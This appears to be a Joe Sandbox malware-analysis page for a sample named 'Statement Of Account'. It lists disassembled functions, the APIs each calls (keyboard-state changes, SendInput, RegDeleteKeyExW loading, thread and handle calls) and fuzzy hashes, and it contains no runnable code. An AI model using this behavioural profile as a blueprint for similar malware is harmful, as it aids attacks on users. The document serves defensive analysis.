Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
String ID:
API String ID: 1269668773-0
Opcode ID: 0d7b65c6ab38dbefdfd62d93c8bf275ac45e934a4136d591895be9c5171332a1
Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
Opcode Fuzzy Hash: 0d7b65c6ab38dbefdfd62d93c8bf275ac45e934a4136d591895be9c5171332a1
Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D

Function 004140CF Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41

___set_flsgetvalue.LIBCMT ref: 004140E1

Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE

___fls_getvalue@4.LIBCMT ref: 004140EC

Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72

___fls_setvalue@8.LIBCMT ref: 004140FF

Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9

GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
RtlExitUserThread.NTDLL(00000000), ref: 0041410F
GetCurrentThreadId.KERNEL32 ref: 00414115
__freefls@4.LIBCMT ref: 00414135
__IsNonwritableInCurrentImage.LIBCMT ref: 00414148

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritableUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 3333014375-0
Opcode ID: 234ab307b5c40b08ea0c1433cc5e64915265a7813faf8dc664d6b0a8a95377c8
Instruction ID: 911ed986ec53ede6ef0b83571fa98f68ea879814fd42304df77ef2b59abdac01
Opcode Fuzzy Hash: 234ab307b5c40b08ea0c1433cc5e64915265a7813faf8dc664d6b0a8a95377c8
Instruction Fuzzy Hash: 6201A171400205BBCB003FB6DC0E5DF76ACAF95399B22086EFA0193212DA7CC9C1866D

Function 00439102 Relevance: 10.5, APIs: 7, Instructions: 46threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
Part of subcall function 00438FE4: RtlAllocateHeap.NTDLL(00000000), ref: 00438FEF

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
String ID:
API String ID: 1422014791-0
Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65

Function 0041567F Relevance: 10.5, APIs: 7, Instructions: 41threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41

___set_flsgetvalue.LIBCMT ref: 00415690

Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE

___fls_getvalue@4.LIBCMT ref: 0041569B

Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72

___fls_setvalue@8.LIBCMT ref: 004156AD

Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9

GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
RtlExitUserThread.NTDLL(00000000), ref: 004156BD
__freefls@4.LIBCMT ref: 004156D9
__IsNonwritableInCurrentImage.LIBCMT ref: 004156EC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThreadUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 3429761990-0
Opcode ID: 68f8895410578a6558ff0b3d5985a9e6c93f505c3c296d3eff7805ab3ee2bdad
Instruction ID: 437946ba33081a53f8e8a37eff8b1c0e9594209f2053f9d7bb117d63c1528b40
Opcode Fuzzy Hash: 68f8895410578a6558ff0b3d5985a9e6c93f505c3c296d3eff7805ab3ee2bdad
Instruction Fuzzy Hash: 88016274500705ABD704BFB2DD199DE7B69AF84349B21C86FB90897222DA3DC9C1CB9C

Function 0041568B Relevance: 10.5, APIs: 7, Instructions: 37threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 00415690

Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE

___fls_getvalue@4.LIBCMT ref: 0041569B

Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72

___fls_setvalue@8.LIBCMT ref: 004156AD

Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9

GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
RtlExitUserThread.NTDLL(00000000), ref: 004156BD
__freefls@4.LIBCMT ref: 004156D9
__IsNonwritableInCurrentImage.LIBCMT ref: 004156EC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThreadUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 944295313-0
Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C

Function 00434124 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146

Strings

RegDeleteKeyExW, xrefs: 00434140
p#D, xrefs: 00434124
advapi32.dll, xrefs: 0043412F
p#D, xrefs: 00434125

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
API String ID: 2574300362-3261711971
Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68

Function 004336C7 Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00433724
GetWindowRect.USER32(00000000,?), ref: 00433757
GetClientRect.USER32(0000001D,?), ref: 004337AC
GetSystemMetrics.USER32(0000000F), ref: 00433800
GetWindowRect.USER32(?,?), ref: 00433814
ScreenToClient.USER32(?,?), ref: 00433842

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Rect$Client$Window$MetricsScreenSystem
String ID:
API String ID: 3220332590-0
Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A

Function 00457838 Relevance: 9.2, APIs: 6, Instructions: 176COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0045788F
_malloc.LIBCMT ref: 004578A5
_strcat.LIBCMT ref: 004578CE
_wcslen.LIBCMT ref: 004578FB
_malloc.LIBCMT ref: 00457914
_wcscpy.LIBCMT ref: 0045792C

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _malloc_wcslen$_strcat_wcscpy
String ID:
API String ID: 1612042205-0
Opcode ID: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
Opcode Fuzzy Hash: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A

Function 0044C522 Relevance: 9.2, APIs: 6, Instructions: 155windowkeyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
SetKeyboardState.USER32(00000080), ref: 0044C59B
PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
SendInput.USER32 ref: 0044C6E2

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessagePost$KeyboardState$InputSend
String ID:
API String ID: 2221674350-0
Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA

Function 00455297 Relevance: 9.1, APIs: 6, Instructions: 149windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
6F540200.COMCTL32(?,?,?,?), ref: 004552EB
SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyCursor.USER32(?), ref: 0045566A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DeleteMessageObjectSend$CursorDestroyF540200
String ID:
API String ID: 3294316440-0
Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54

Function 00445153 Relevance: 9.1, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 0044523F
_wcscat.LIBCMT ref: 00445246
_wcscpy.LIBCMT ref: 0044525A
_wcscpy.LIBCMT ref: 0044528C
_wcscat.LIBCMT ref: 00445293
_wcscpy.LIBCMT ref: 004452A7

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcscpy$_wcscat
String ID:
API String ID: 2037614760-0
Opcode ID: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
Opcode Fuzzy Hash: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE

Function 00447B66 Relevance: 9.1, APIs: 6, Instructions: 119COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
GetWindowRect.USER32(?,?), ref: 00447C1B
ScreenToClient.USER32(?,?), ref: 00447C39
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
EndPaint.USER32(?,?), ref: 00447CD1

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Paint$BeginClientRectRectangleScreenViewportWindow
String ID:
API String ID: 4189319755-0
Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69

Function 0044B474 Relevance: 9.1, APIs: 6, Instructions: 113fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
RtlEnterCriticalSection.NTDLL(00000000), ref: 0044B4E3
RtlLeaveCriticalSection.NTDLL(00000000), ref: 0044B5A0
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID:
API String ID: 1726766782-0
Opcode ID: 3a1f833abb26ce593740c71d471a220e6d34013d7717cf1b73c6152b0bb325a5
Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
Opcode Fuzzy Hash: 3a1f833abb26ce593740c71d471a220e6d34013d7717cf1b73c6152b0bb325a5
Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A

Function 00441077 Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
EnableWindow.USER32(?,00000000), ref: 0044111A
ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
EnableWindow.USER32(?,00000001), ref: 004411B3
SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5

Memory Dump Source

